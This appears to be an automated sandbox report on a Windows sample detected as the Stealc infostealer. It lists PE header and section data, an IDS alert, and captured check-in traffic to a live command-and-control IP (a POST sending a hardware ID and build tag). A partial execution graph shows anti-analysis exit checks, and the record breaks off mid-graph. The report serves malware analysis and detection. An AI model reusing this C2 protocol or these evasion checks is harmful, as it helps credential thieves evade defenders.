                                    TLSH:8BA53393065BB925C75C3772D28B6EEE31E104D604177ABEB527D8B13A43A22F03BD64
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0xb4a000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007F96F93F4BBAh
                                    movaps xmm4, dqword ptr [ecx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [edx+ecx], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx+ecx], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax+00000000h], eax
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [edx], ecx
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x2e70000x67600e879f4b89ed07b7afe5e21af5e477179unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x2ea0000x2b50000x200ef759830474f1838668da3d3961e74eaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    szuavcfa0x59f0000x1aa0000x1a9a0079fd7ff8b6a76f2576ec8a9913b6cd00False0.9949861187591776data7.954150406224703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    lozgslii0x7490000x10000x40070114bf6eb5d300cde0ec57f5e09e71aFalse0.767578125data5.972169537006448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x74a0000x30000x2200c6c30224976aa1f98dff4659d4196836False0.05859375DOS executable (COM)0.7690936055256556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-28T21:41:05.720999+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649710185.215.113.20680TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 28, 2024 21:41:04.452475071 CET4971080192.168.2.6185.215.113.206
                                    Oct 28, 2024 21:41:04.457945108 CET8049710185.215.113.206192.168.2.6
                                    Oct 28, 2024 21:41:04.461972952 CET4971080192.168.2.6185.215.113.206
                                    Oct 28, 2024 21:41:04.462573051 CET4971080192.168.2.6185.215.113.206
                                    Oct 28, 2024 21:41:04.468054056 CET8049710185.215.113.206192.168.2.6
                                    Oct 28, 2024 21:41:05.396541119 CET8049710185.215.113.206192.168.2.6
                                    Oct 28, 2024 21:41:05.396617889 CET4971080192.168.2.6185.215.113.206
                                    Oct 28, 2024 21:41:05.432517052 CET4971080192.168.2.6185.215.113.206
                                    Oct 28, 2024 21:41:05.438009977 CET8049710185.215.113.206192.168.2.6
                                    Oct 28, 2024 21:41:05.720895052 CET8049710185.215.113.206192.168.2.6
                                    Oct 28, 2024 21:41:05.720999002 CET4971080192.168.2.6185.215.113.206
                                    Oct 28, 2024 21:41:08.596872091 CET4971080192.168.2.6185.215.113.206

                                    HTTP Request Dependency Graph

                                    • 185.215.113.206

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649710185.215.113.206806552C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 28, 2024 21:41:04.462573051 CET90OUTGET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 28, 2024 21:41:05.396541119 CET203INHTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 20:41:05 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 28, 2024 21:41:05.432517052 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
                                    Host: 185.215.113.206
                                    Content-Length: 211
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 35 34 37 34 42 46 32 42 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a
                                    Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"7E5474BF2BE41866486636------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"tale------AECAECFCAAEBFHIEHDGH--
                                    Oct 28, 2024 21:41:05.720895052 CET210INHTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 20:41:05 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:16:40:58
                                    Start date:28/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0x110000
                                    File size:2'181'632 bytes
                                    MD5 hash:37AD51A72AE2EE4F18F90DB961CA42E0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2.9%
                                      Total number of Nodes:1327
                                      Total number of Limit Nodes:24
                                      execution_graph 37473 126c90 37518 1122a0 37473->37518 37497 126d04 37498 12acc0 4 API calls 37497->37498 37499 126d0b 37498->37499 37500 12acc0 4 API calls 37499->37500 37501 126d12 37500->37501 37502 12acc0 4 API calls 37501->37502 37503 126d19 37502->37503 37504 12acc0 4 API calls 37503->37504 37505 126d20 37504->37505 37670 12abb0 37505->37670 37507 126dac 37674 126bc0 GetSystemTime 37507->37674 37509 126d29 37509->37507 37511 126d62 OpenEventA 37509->37511 37513 126d95 CloseHandle Sleep 37511->37513 37514 126d79 37511->37514 37516 126daa 37513->37516 37517 126d81 CreateEventA 37514->37517 37515 126db6 CloseHandle ExitProcess 37516->37509 37517->37507 37871 114610 37518->37871 37520 1122b4 37521 114610 2 API calls 37520->37521 37522 1122cd 37521->37522 37523 114610 2 API calls 37522->37523 37524 1122e6 37523->37524 37525 114610 2 API calls 37524->37525 37526 1122ff 37525->37526 37527 114610 2 API calls 37526->37527 37528 112318 37527->37528 37529 114610 2 API calls 37528->37529 37530 112331 37529->37530 37531 114610 2 API calls 37530->37531 37532 11234a 37531->37532 37533 114610 2 API calls 37532->37533 37534 112363 37533->37534 37535 114610 2 API calls 37534->37535 37536 11237c 37535->37536 37537 114610 2 API calls 37536->37537 37538 112395 37537->37538 37539 114610 2 API calls 37538->37539 37540 1123ae 37539->37540 37541 114610 2 API calls 37540->37541 37542 1123c7 37541->37542 37543 114610 2 API calls 37542->37543 37544 1123e0 37543->37544 37545 114610 2 API calls 37544->37545 37546 1123f9 37545->37546 37547 114610 2 API calls 37546->37547 37548 112412 37547->37548 37549 114610 2 API calls 37548->37549 37550 11242b 37549->37550 37551 114610 2 API calls 37550->37551 37552 112444 37551->37552 37553 114610 2 API calls 37552->37553 37554 11245d 37553->37554 37555 114610 2 API calls 37554->37555 37556 112476 37555->37556 37557 114610 2 API calls 37556->37557 37558 11248f 37557->37558 37559 114610 2 API calls 37558->37559 37560 1124a8 37559->37560 37561 114610 2 API calls 37560->37561 37562 1124c1 37561->37562 37563 114610 2 API calls 37562->37563 37564 1124da 37563->37564 37565 114610 2 API calls 37564->37565 37566 1124f3 37565->37566 37567 114610 2 API calls 37566->37567 37568 11250c 37567->37568 37569 114610 2 API calls 37568->37569 37570 112525 37569->37570 37571 114610 2 API calls 37570->37571 37572 11253e 37571->37572 37573 114610 2 API calls 37572->37573 37574 112557 37573->37574 37575 114610 2 API calls 37574->37575 37576 112570 37575->37576 37577 114610 2 API calls 37576->37577 37578 112589 37577->37578 37579 114610 2 API calls 37578->37579 37580 1125a2 37579->37580 37581 114610 2 API calls 37580->37581 37582 1125bb 37581->37582 37583 114610 2 API calls 37582->37583 37584 1125d4 37583->37584 37585 114610 2 API calls 37584->37585 37586 1125ed 37585->37586 37587 114610 2 API calls 37586->37587 37588 112606 37587->37588 37589 114610 2 API calls 37588->37589 37590 11261f 37589->37590 37591 114610 2 API calls 37590->37591 37592 112638 37591->37592 37593 114610 2 API calls 37592->37593 37594 112651 37593->37594 37595 114610 2 API calls 37594->37595 37596 11266a 37595->37596 37597 114610 2 API calls 37596->37597 37598 112683 37597->37598 37599 114610 2 API calls 37598->37599 37600 11269c 37599->37600 37601 114610 2 API calls 37600->37601 37602 1126b5 37601->37602 37603 114610 2 API calls 37602->37603 37604 1126ce 37603->37604 37605 129bb0 37604->37605 37876 129aa0 GetPEB 37605->37876 37607 129bb8 37608 129de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37607->37608 37609 129bca 37607->37609 37610 129e44 GetProcAddress 37608->37610 37611 129e5d 37608->37611 37612 129bdc 21 API calls 37609->37612 37610->37611 37613 129e96 37611->37613 37614 129e66 GetProcAddress GetProcAddress 37611->37614 37612->37608 37615 129eb8 37613->37615 37616 129e9f GetProcAddress 37613->37616 37614->37613 37617 129ec1 GetProcAddress 37615->37617 37618 129ed9 37615->37618 37616->37615 37617->37618 37619 129ee2 GetProcAddress GetProcAddress 37618->37619 37620 126ca0 37618->37620 37619->37620 37621 12aa50 37620->37621 37622 12aa60 37621->37622 37623 126cad 37622->37623 37624 12aa8e lstrcpy 37622->37624 37625 1111d0 37623->37625 37624->37623 37626 1111e8 37625->37626 37627 111217 37626->37627 37628 11120f ExitProcess 37626->37628 37629 111160 GetSystemInfo 37627->37629 37630 111184 37629->37630 37631 11117c ExitProcess 37629->37631 37632 111110 GetCurrentProcess VirtualAllocExNuma 37630->37632 37633 111141 ExitProcess 37632->37633 37634 111149 37632->37634 37877 1110a0 VirtualAlloc 37634->37877 37637 111220 37881 128b40 37637->37881 37640 111249 __aulldiv 37641 11129a 37640->37641 37642 111292 ExitProcess 37640->37642 37643 126a10 GetUserDefaultLangID 37641->37643 37644 126a32 37643->37644 37645 126a73 37643->37645 37644->37645 37646 126a43 ExitProcess 37644->37646 37647 126a61 ExitProcess 37644->37647 37648 126a57 ExitProcess 37644->37648 37649 126a6b ExitProcess 37644->37649 37650 126a4d ExitProcess 37644->37650 37651 111190 37645->37651 37652 127a70 3 API calls 37651->37652 37653 11119e 37652->37653 37654 1111cc 37653->37654 37655 1279e0 3 API calls 37653->37655 37658 1279e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37654->37658 37656 1111b7 37655->37656 37656->37654 37657 1111c4 ExitProcess 37656->37657 37659 126cd0 37658->37659 37660 127a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37659->37660 37661 126ce3 37660->37661 37662 12acc0 37661->37662 37883 12aa20 37662->37883 37664 12acd1 lstrlen 37666 12acf0 37664->37666 37665 12ad28 37884 12aab0 37665->37884 37666->37665 37669 12ad0a lstrcpy lstrcat 37666->37669 37668 12ad34 37668->37497 37669->37665 37671 12abcb 37670->37671 37672 12ac1b 37671->37672 37673 12ac09 lstrcpy 37671->37673 37672->37509 37673->37672 37888 126ac0 37674->37888 37676 126c2e 37677 126c38 sscanf 37676->37677 37917 12ab10 37677->37917 37679 126c4a SystemTimeToFileTime SystemTimeToFileTime 37680 126c80 37679->37680 37681 126c6e 37679->37681 37683 125d60 37680->37683 37681->37680 37682 126c78 ExitProcess 37681->37682 37684 125d6d 37683->37684 37685 12aa50 lstrcpy 37684->37685 37686 125d7e 37685->37686 37919 12ab30 lstrlen 37686->37919 37689 12ab30 2 API calls 37690 125db4 37689->37690 37691 12ab30 2 API calls 37690->37691 37692 125dc4 37691->37692 37923 126680 37692->37923 37695 12ab30 2 API calls 37696 125de3 37695->37696 37697 12ab30 2 API calls 37696->37697 37698 125df0 37697->37698 37699 12ab30 2 API calls 37698->37699 37700 125dfd 37699->37700 37701 12ab30 2 API calls 37700->37701 37702 125e49 37701->37702 37932 1126f0 37702->37932 37710 125f13 37711 126680 lstrcpy 37710->37711 37712 125f25 37711->37712 37713 12aab0 lstrcpy 37712->37713 37714 125f42 37713->37714 37715 12acc0 4 API calls 37714->37715 37716 125f5a 37715->37716 37717 12abb0 lstrcpy 37716->37717 37718 125f66 37717->37718 37719 12acc0 4 API calls 37718->37719 37720 125f8a 37719->37720 37721 12abb0 lstrcpy 37720->37721 37722 125f96 37721->37722 37723 12acc0 4 API calls 37722->37723 37724 125fba 37723->37724 37725 12abb0 lstrcpy 37724->37725 37726 125fc6 37725->37726 37727 12aa50 lstrcpy 37726->37727 37728 125fee 37727->37728 38658 127690 GetWindowsDirectoryA 37728->38658 37731 12aab0 lstrcpy 37732 126008 37731->37732 38668 1148d0 37732->38668 37734 12600e 38813 1219f0 37734->38813 37736 126016 37737 12aa50 lstrcpy 37736->37737 37738 126039 37737->37738 37739 111590 lstrcpy 37738->37739 37740 12604d 37739->37740 38829 1159b0 34 API calls codecvt 37740->38829 37742 126053 38830 121280 lstrlen lstrcpy 37742->38830 37744 12605e 37745 12aa50 lstrcpy 37744->37745 37746 126082 37745->37746 37747 111590 lstrcpy 37746->37747 37748 126096 37747->37748 38831 1159b0 34 API calls codecvt 37748->38831 37750 12609c 38832 120fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37750->38832 37752 1260a7 37753 12aa50 lstrcpy 37752->37753 37754 1260c9 37753->37754 37755 111590 lstrcpy 37754->37755 37756 1260dd 37755->37756 38833 1159b0 34 API calls codecvt 37756->38833 37758 1260e3 38834 121170 StrCmpCA lstrlen lstrcpy 37758->38834 37760 1260ee 37761 111590 lstrcpy 37760->37761 37762 126105 37761->37762 38835 121c60 115 API calls 37762->38835 37764 12610a 37765 12aa50 lstrcpy 37764->37765 37766 126126 37765->37766 38836 115000 7 API calls 37766->38836 37768 12612b 37769 111590 lstrcpy 37768->37769 37770 1261ab 37769->37770 38837 1208a0 285 API calls 37770->38837 37772 1261b0 37773 12aa50 lstrcpy 37772->37773 37774 1261d6 37773->37774 37775 111590 lstrcpy 37774->37775 37776 1261ea 37775->37776 38838 1159b0 34 API calls codecvt 37776->38838 37778 1261f0 38839 1213c0 StrCmpCA lstrlen lstrcpy 37778->38839 37780 1261fb 37781 111590 lstrcpy 37780->37781 37782 12623b 37781->37782 38840 111ec0 59 API calls 37782->38840 37784 126240 37785 1262e2 37784->37785 37786 126250 37784->37786 37788 12aab0 lstrcpy 37785->37788 37787 12aa50 lstrcpy 37786->37787 37789 126270 37787->37789 37790 1262f5 37788->37790 37792 111590 lstrcpy 37789->37792 37791 111590 lstrcpy 37790->37791 37793 126309 37791->37793 37794 126284 37792->37794 38844 1159b0 34 API calls codecvt 37793->38844 38841 1159b0 34 API calls codecvt 37794->38841 37797 12630f 38845 1237b0 31 API calls 37797->38845 37798 12628a 38842 121520 19 API calls codecvt 37798->38842 37801 1262da 37806 111590 lstrcpy 37801->37806 37839 12635b 37801->37839 37802 126295 37803 111590 lstrcpy 37802->37803 37804 1262d5 37803->37804 38843 124010 67 API calls 37804->38843 37805 126380 37809 1263a5 37805->37809 37812 111590 lstrcpy 37805->37812 37810 126337 37806->37810 37808 111590 lstrcpy 37811 12637b 37808->37811 37817 111590 lstrcpy 37809->37817 37828 1263ca 37809->37828 38846 124300 57 API calls 2 library calls 37810->38846 38848 1249d0 88 API calls codecvt 37811->38848 37815 1263a0 37812->37815 38849 124e00 61 API calls codecvt 37815->38849 37816 12633c 37820 111590 lstrcpy 37816->37820 37821 1263c5 37817->37821 37818 111590 lstrcpy 37823 1263ea 37818->37823 37825 126356 37820->37825 38850 124fc0 65 API calls 37821->38850 38851 125190 63 API calls codecvt 37823->38851 37824 111590 lstrcpy 37831 12640f 37824->37831 38847 125350 44 API calls 37825->38847 37826 126439 37829 126460 37826->37829 37834 111590 lstrcpy 37826->37834 37827 111590 lstrcpy 37833 126434 37827->37833 37828->37818 37835 1263ef 37828->37835 37836 126503 37829->37836 37837 126470 37829->37837 38852 117770 107 API calls codecvt 37831->38852 38853 1252a0 61 API calls codecvt 37833->38853 37841 126459 37834->37841 37835->37824 37844 126414 37835->37844 37842 12aab0 lstrcpy 37836->37842 37843 12aa50 lstrcpy 37837->37843 37839->37805 37839->37808 38854 1291a0 46 API calls codecvt 37841->38854 37846 126516 37842->37846 37847 126491 37843->37847 37844->37826 37844->37827 37848 111590 lstrcpy 37846->37848 37849 111590 lstrcpy 37847->37849 37850 12652a 37848->37850 37851 1264a5 37849->37851 38858 1159b0 34 API calls codecvt 37850->38858 38855 1159b0 34 API calls codecvt 37851->38855 37854 1264ab 38856 121520 19 API calls codecvt 37854->38856 37855 126530 38859 1237b0 31 API calls 37855->38859 37858 1264fb 37861 12aab0 lstrcpy 37858->37861 37859 1264b6 37860 111590 lstrcpy 37859->37860 37862 1264f6 37860->37862 37863 12654c 37861->37863 38857 124010 67 API calls 37862->38857 37865 111590 lstrcpy 37863->37865 37866 126560 37865->37866 38860 1159b0 34 API calls codecvt 37866->38860 37868 12656c 37870 126588 37868->37870 38861 1268d0 9 API calls codecvt 37868->38861 37870->37515 37872 114621 RtlAllocateHeap 37871->37872 37875 114671 VirtualProtect 37872->37875 37875->37520 37876->37607 37878 1110c2 codecvt 37877->37878 37879 1110fd 37878->37879 37880 1110e2 VirtualFree 37878->37880 37879->37637 37880->37879 37882 111233 GlobalMemoryStatusEx 37881->37882 37882->37640 37883->37664 37885 12aad2 37884->37885 37886 12aafc 37885->37886 37887 12aaea lstrcpy 37885->37887 37886->37668 37887->37886 37889 12aa50 lstrcpy 37888->37889 37890 126ad3 37889->37890 37891 12acc0 4 API calls 37890->37891 37892 126ae5 37891->37892 37893 12abb0 lstrcpy 37892->37893 37894 126aee 37893->37894 37895 12acc0 4 API calls 37894->37895 37896 126b07 37895->37896 37897 12abb0 lstrcpy 37896->37897 37898 126b10 37897->37898 37899 12acc0 4 API calls 37898->37899 37900 126b2a 37899->37900 37901 12abb0 lstrcpy 37900->37901 37902 126b33 37901->37902 37903 12acc0 4 API calls 37902->37903 37904 126b4c 37903->37904 37905 12abb0 lstrcpy 37904->37905 37906 126b55 37905->37906 37907 12acc0 4 API calls 37906->37907 37908 126b6f 37907->37908 37909 12abb0 lstrcpy 37908->37909 37910 126b78 37909->37910 37911 12acc0 4 API calls 37910->37911 37912 126b93 37911->37912 37913 12abb0 lstrcpy 37912->37913 37914 126b9c 37913->37914 37915 12aab0 lstrcpy 37914->37915 37916 126bb0 37915->37916 37916->37676 37918 12ab22 37917->37918 37918->37679 37920 12ab4f 37919->37920 37921 125da4 37920->37921 37922 12ab8b lstrcpy 37920->37922 37921->37689 37922->37921 37924 12abb0 lstrcpy 37923->37924 37925 126693 37924->37925 37926 12abb0 lstrcpy 37925->37926 37927 1266a5 37926->37927 37928 12abb0 lstrcpy 37927->37928 37929 1266b7 37928->37929 37930 12abb0 lstrcpy 37929->37930 37931 125dd6 37930->37931 37931->37695 37933 114610 2 API calls 37932->37933 37934 112704 37933->37934 37935 114610 2 API calls 37934->37935 37936 112727 37935->37936 37937 114610 2 API calls 37936->37937 37938 112740 37937->37938 37939 114610 2 API calls 37938->37939 37940 112759 37939->37940 37941 114610 2 API calls 37940->37941 37942 112786 37941->37942 37943 114610 2 API calls 37942->37943 37944 11279f 37943->37944 37945 114610 2 API calls 37944->37945 37946 1127b8 37945->37946 37947 114610 2 API calls 37946->37947 37948 1127e5 37947->37948 37949 114610 2 API calls 37948->37949 37950 1127fe 37949->37950 37951 114610 2 API calls 37950->37951 37952 112817 37951->37952 37953 114610 2 API calls 37952->37953 37954 112830 37953->37954 37955 114610 2 API calls 37954->37955 37956 112849 37955->37956 37957 114610 2 API calls 37956->37957 37958 112862 37957->37958 37959 114610 2 API calls 37958->37959 37960 11287b 37959->37960 37961 114610 2 API calls 37960->37961 37962 112894 37961->37962 37963 114610 2 API calls 37962->37963 37964 1128ad 37963->37964 37965 114610 2 API calls 37964->37965 37966 1128c6 37965->37966 37967 114610 2 API calls 37966->37967 37968 1128df 37967->37968 37969 114610 2 API calls 37968->37969 37970 1128f8 37969->37970 37971 114610 2 API calls 37970->37971 37972 112911 37971->37972 37973 114610 2 API calls 37972->37973 37974 11292a 37973->37974 37975 114610 2 API calls 37974->37975 37976 112943 37975->37976 37977 114610 2 API calls 37976->37977 37978 11295c 37977->37978 37979 114610 2 API calls 37978->37979 37980 112975 37979->37980 37981 114610 2 API calls 37980->37981 37982 11298e 37981->37982 37983 114610 2 API calls 37982->37983 37984 1129a7 37983->37984 37985 114610 2 API calls 37984->37985 37986 1129c0 37985->37986 37987 114610 2 API calls 37986->37987 37988 1129d9 37987->37988 37989 114610 2 API calls 37988->37989 37990 1129f2 37989->37990 37991 114610 2 API calls 37990->37991 37992 112a0b 37991->37992 37993 114610 2 API calls 37992->37993 37994 112a24 37993->37994 37995 114610 2 API calls 37994->37995 37996 112a3d 37995->37996 37997 114610 2 API calls 37996->37997 37998 112a56 37997->37998 37999 114610 2 API calls 37998->37999 38000 112a6f 37999->38000 38001 114610 2 API calls 38000->38001 38002 112a88 38001->38002 38003 114610 2 API calls 38002->38003 38004 112aa1 38003->38004 38005 114610 2 API calls 38004->38005 38006 112aba 38005->38006 38007 114610 2 API calls 38006->38007 38008 112ad3 38007->38008 38009 114610 2 API calls 38008->38009 38010 112aec 38009->38010 38011 114610 2 API calls 38010->38011 38012 112b05 38011->38012 38013 114610 2 API calls 38012->38013 38014 112b1e 38013->38014 38015 114610 2 API calls 38014->38015 38016 112b37 38015->38016 38017 114610 2 API calls 38016->38017 38018 112b50 38017->38018 38019 114610 2 API calls 38018->38019 38020 112b69 38019->38020 38021 114610 2 API calls 38020->38021 38022 112b82 38021->38022 38023 114610 2 API calls 38022->38023 38024 112b9b 38023->38024 38025 114610 2 API calls 38024->38025 38026 112bb4 38025->38026 38027 114610 2 API calls 38026->38027 38028 112bcd 38027->38028 38029 114610 2 API calls 38028->38029 38030 112be6 38029->38030 38031 114610 2 API calls 